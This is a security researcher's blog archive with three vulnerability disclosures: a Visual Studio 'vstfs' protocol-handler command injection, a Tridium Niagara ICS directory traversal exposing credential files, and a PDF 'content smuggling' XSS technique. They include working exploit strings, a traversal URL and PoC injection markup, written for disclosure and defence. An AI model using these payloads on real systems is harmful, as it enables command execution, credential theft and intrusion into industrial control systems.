Archive for the 'Security' Category

Thursday, February 12th, 2015

Visual Studio VSTFS protocol handler command injection

Last week, someone told me that my blog was on the “LovelyHorse” list. I’ve always thought that I was the only person who cared about this blog, but I guess there is a lonely analyst out there that also cares… lonely analyst, this one is for you :)

I reported an issue affecting Visual Studio 2012 (which I had installed on one of my dev machines at the time). The issue was a blast from the past and reminded me of simpler times when I had the privilege of doing vulnerability research with Nate McFeters and Rob Carter :). Microsoft has addressed the issue, but determined that this issue did not warrant a bulletin, so you’ll have download the Visual Studio 2012 update 4 if you want to “patch” this issue. I have not verified whether other versions of Visual Studio were/are affected. Tested on Win7 with IE10 and VS2012.

Visual Studio 2012 registers the “vstfs” protocol handler during the installation process. This protocol handler calls devenv.exe in the following manner:

“C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe” /TfsLink “%1″

As you know, protocol handlers can be instantiated remotely, most commonly via web pages. The “%1″ value can be attacker controlled and contains the values supplied when the attacker calls the protocol handler:

<iframe src=”vstfs:test“></iframe>

will result in the following being passed to the shell:

“C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe” /TfsLink “vstfs:test

Some time ago, I discovered that it was possible to escape out of double quotes when passing argument values to protocol handlers via Internet Explorer (and other browsers on Windows like Chrome). Sadly, this behavior is “by-design” and will not be fixed anytime soon. Knowing this, we can inject additional command line switches which will be passed to devenv.exe. If we know of suitable command line switch for devenv.exe we can repurpose devenv.exe and the vstfs protocol handler to do our bidding. For example, if we pass the following the Internet Explorer (copy/paste into the address bar or serve from a webpage):

vstfs:test” /command “Tools.Shell /c c:\windows\system32\calc.exe

We’ll end up with the following being passed to the remote system:

“C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe” /TfsLink “vstfs:test” /command “Tools.Shell /c c:\windows\system32\calc.exe”

The line above, launches devenv.exe and also shells an executable of our choice (with the ability to pass arbitrary command line arguments to that arbitrary executable).

Fortunately, modern browsers (with the exception of Safari… but who uses Safari on Windows?!?!) have warnings when launching protocol handlers. This means users will likely encounter two prompts from IE (protocol handler warning and an elevation warning), you can witness this if you copy/paste the vstfs:test” /command “Tools.Shell /c c:\windows\system32\calc.exe” string into the IE address bar (tested against IE10 with a system that has VS2012).

There might be a way to bounce this protocol handler off a whitelisted protocol handler (one that doesn’t cause a protocol handler warning) running at medium. Alternatively, we could pass this protocol handler to a remote user via an application that doesn’t have protocol handler warnings (like a chat application that supports URLs). If we can find such a case there will be no warnings to the user and we’ll have a zero click or one click remote command injection exploit against Visual Studio users.

Posted by xssniper | Filed in Security | Comment now »

 

Monday, November 26th, 2012

Tridium Niagara – Directory Traversal

In July of this year, I wrote about some of the frustrations I encountered when working with Tridium and trying to get them to fix various issues with their Niagara framework. The Niagara framework is the most prevalent Industrial Control System (ICS) in the world; it links together various ICS technologies and protocols. Looking at Eireann Leverett’s research on Internet accessible ICS, we see that Tridium Niagara is the prevalent ICS system available from the Internet. I didn’t talk much about the details of the issues I reported to DHS, but considering the patch has been out for nearly six months, I figure now is a good time.


The initial issue I reported to Tridum was a directory traversal issue that allowed remote, authenticated users to access files outside of the webroot. “Authenticated” includes demo and low privileged accounts. The directory traversal is very simple. Most web application security specialists know the classic “../../” style directory traversal, however Tridium was a bit different. Tridium makes use of “ordinals” to enable various functionalities within Niagara. For example, here is a URL for a Niagara deployment that uses the “station” ordinal:


http://axdemo.tridium.com/ord?station:%7Cslot:/Drivers/DemoNetwork




The Niagara framework supports a large number of ordinals. One of these ordinals is the “file” ordinal, which is used to retrieve files from the Niagara framework server. The “file” ordinal followed by the path and filename to some file located within the webroot of the Niagara framework server. The Tridium Niagara framework isn’t susceptible to “../../” style traversal attacks, instead the Niagara framework uses the “^” character to traverse directories. Knowing this, we can specify a “^” character immediately following the file ordinal to traverse outside of the webroot. There are several files just outside of the webroot, however there is one file that is particularly interesting, a file named “config.bog”. The config.bog file is the configuration file for the entire Tridium Niagara deployment. The config.bog file contains all the configuration settings including username and encrapted (yes, I said encrapted… not encrypted) passwords for all accounts enabled on the system. Knowing this, we have a simple, reliable form of privilege escalation for any Tridium Niagara device. The exploit is very simple:

http://Niagara-installation/ord?file:^config.bog



When you make the request above, you’ll download a compressed file. Unzip the compressed file and you’ll find the clear text config.bog for the Niagara server. Inside the config.bog, you’ll see the entire, detailed configuration for the Tridium device along with the username and passwords (protected with encraption). That’s it, it’s that simple. When I reported this issue to Tridium, I sent them a copy of their config.bog file for their marketing demo deployment.


Let’s ignore the fact that demo, default, and guest accounts are fairly common on these devices. In addition to the directory traversal, I also reported a weak session issue and insecure storage of user credentials issue. The Tridium Niagara framework generates sessionids that have about 9 bits of strength. This makes brute force attacks completely feasible and allows a remote attacker to quickly gain access to an authenticated state. Once authenticated, they are free to utilize the directory traversal to escalate privilege to Administrator. If that weren’t enough, the Tridium Niagara framework also stores a copy of the current username and password (base64’d) in the cookie giving any XSS bug the potential to divulge the clear text username and password.


There is a shining light to this story. When I first reported this issue to Tridium, the initial response was horrid. 6 months after the initial report, Tridium’s leadership attempted to pass these vulnerabilities off as “by-design”. Eventually, the folks at Honeywell (Tridium’s parent company) found about these issues and took over the response process. Three weeks later, they had a patch ready to go. Honeywell made the patch available to me a few days in advance of the release so I could take a look and verify the issues were fixed. They even gave me credentials to the new demo site so I could see the new features and security changes. It was welcoming to see an ICS vendor take such a stance towards security researchers, I hope other ICS vendors take note and follow suit. I’d like to personally thank Kevin Staggs for driving the renewed focus on security for Tridium Niagara, if you’re a Tridum customer, you should thank Kevin too. If you are a Tridium customer, you can learn more about the patch here:

https://www.tridium.com/cs/tridium_news/security_patch_36

BK

Posted by xssniper | Filed in ICS, Security | 2 Comments »

 

Thursday, October 11th, 2012

Content Smuggling

A few years ago, I discovered a peculiar design decision described in the PDF specification. This design flaw allows for an attacker to conduct XSS attacks against some websites that would not normally have XSS vulnerabilities. I reported this issue to Adobe in late 2009. Apparently, there are some challenging back-compat issues which make changing this design difficult. Given it’s been nearly three years since I first reported the issue to Adobe and a fix from Adobe doesn’t seem likely (Chrome has already fixed their internal PDF reader), I figured I should let web application community know about the exposures. I don’t expect “APT” or other 31337 $country “cyber liberation armies” to use this anytime soon, but it is interesting behavior and I hope web application security folks find it interesting. Hopefully some researcher who’s smarter than me can take this to the next level. Oh, and I apologize for the ugly PoCs in advance!

If we take a look at section 3.4.1, “File Header” of Appendix H in the PDF specification, we see the following:

13. Acrobat viewers require only that the header appear somewhere within
the first 1024 bytes of the file.

Anyone who has read the PDF specification probably knows about this behavior, in fact Julia Wolf mentioned this behavior in her epic OMG WTF PDF talk at CCC in 2010. This peculiar design allows for the creation of a hybrid file that is both some arbitrary file type (such as gif, png, doc…etc) and PDF. We do this by cramming a PDF header after another file header. An example of this is shown in the screenshot below:

GIFPDF

Hopefully, by now we’ve already realized that hosting user controlled PDFs and serving those PDFs from a sensitive domain is dangerous from a web security perspective. However, with this quirky file header behavior, we’ll have the ability to smuggle PDFs onto a website that only accepts “benign” file types. As an example, I’ve uploaded such a file to an appspot web application I created. The PoC shows that we can load a single file as both a GIF (or any other file type we want) and a PDF. Adobe PDF reader needs to be set as your default PDF handler for the PoC to work.

http://pdfxss.appspot.com/Son-of-Gifar/Content-Smuggling.html

The only difference in the two displays in the PoC above is the way we reference the file. In the case of the image, we simply use an IMG tag. When we want to force the browser to hand the file to the default PDF reader, we make use of the OBJECT tag and explicitly specify a content type to force the content to be handled by the default PDF reader. Of course, this technique can be generalized for other plugins.

<img src="http://pdfxss.appspot.com/Son-of-Gifar/NotAPDF.gif" height=10 width=10></img>

vs

<object data="http://pdfxss.appspot.com/Son-of-Gifar/NotAPDF.gif" type="application/pdf" width="500" height="500"></object>

PDFs do not have by-design access to the DOM of the domain from which it is served. How then can we use a PDF to achieve XSS? Here is where the feature rich Adobe PDF Reader comes into play. Once the PDF is loaded, we have a couple different options to achieve XSS. First, we can redirect the PDF to a javascript url. These redirections will navigate the browser (not the PDF document) and results in true browser based XSS on the victim domain. Luckily, Adobe considers redirection from a PDF to javascript URLs a bug and has eliminated the most obvious methods for achieving this. There is however, another method which essentially achieves the same impact. We can use a built in API to make network requests to and from the victim domain. These network requests will carry any cookies associated with the victim domain, giving the attacker access to authenticated resources.

The following link demonstrates how this issue would be used against a website. The domain xs-sniper.com (the attacker’s domain in this example) loads a smuggled GIF/PDF from http://pdfxss.appspot.com (the victim domain in this example). Once the PDF is loaded, we make use of the built in XML APIs to retrieve a file /secret.txt from http://pdfxss.appspot.com (the victim domain).

http://xs-sniper.com/sniperscope/Adobe/Son-of-Gifar/PDFXML.html

IE users will see a warning in the PDF reader. This is because IE actually downloads the PDF and opens a local copy :) You can verify the IE behavior by browsing to this PoC with Internet Explorer (Adobe PDF Reader must be set as the default reader).

http://pdfxss.appspot.com/Son-of-Gifar/Location.html

Lastly, you can inject a PDF into a website if you have already XSS. This might be helpful in bypassing XSS filters or application filtering. This is accomplished by injecting a PDF into the vulnerable site using the OBJECT tag.

<object data="http://vulnerable-domain/xss.asp?vulnerable-param=<injected PDF HERE>" type="application/pdf" width="500" height="500"></object>

An example of how this could be done is given below (this PoC best viewed in FireFox with Adobe PDF Reader, but the technique is possible for all browsers).

http://xs-sniper.com/sniperscope/Adobe/Son-of-Gifar/PDF-Injection.html

What’s the impact? Well, I suspect there are plenty of Internet facing web sites that are vulnerable to this bug. Any web application that accepts uploads of “benign” file types and then serves those files back to the user could be affected. This also affects websites which rely on content-type headers to prevent XSS (btw, this strategy doesn’t work). See Phil Purviance’s blog for tips on spotting (and exploiting) websites that use content-type to protect against XSS. This bug can also be used to exploit the applications that use content-disposition headers to prevent XSS bugs. The most common attack surface here will likely be internal content portals. Pretty much every internal content portal used in the enterprise is vulnerable to this issue (think Sharepoint).

You can test for this issue by trying to upload this file to a vulnerable web application. If you see the PDF header in the uploaded file AND the file is served from a sensitive domain (ex. it has auth cookies), then the application is vulnerable.

The proper defense for this is the usage of alternate domains for user supplied content (aka sandboxed domains). Sandboxed domains can be tricky to implement. Some of the most popular web applications on the web already make extensive use of sandbox domains, but the vast majority of web applications do not. Once again, internal content portals are in a hard spot as it’s more difficult to implement a sandboxed domain on an internal network. Sandboxed domains is a subject many “web application security specialists” understand poorly and probably deserves its own blog post. How to properly implementing a sandboxed domain is a great interview question for senior web application security roles because it tests design and implementation skills. It also requires a really solid understanding of browser/plugin same origin policy. I haven’t seen much written about sandboxed domains, but this blog post does a nice job of summing up some of the challenges of content hosting. http://googleonlinesecurity.blogspot.com/2012/08/content-hosting-for-modern-web.html

Happy hunting!

BK

Posted by xssniper | Filed in Security, Web Application Security | 3 Comments »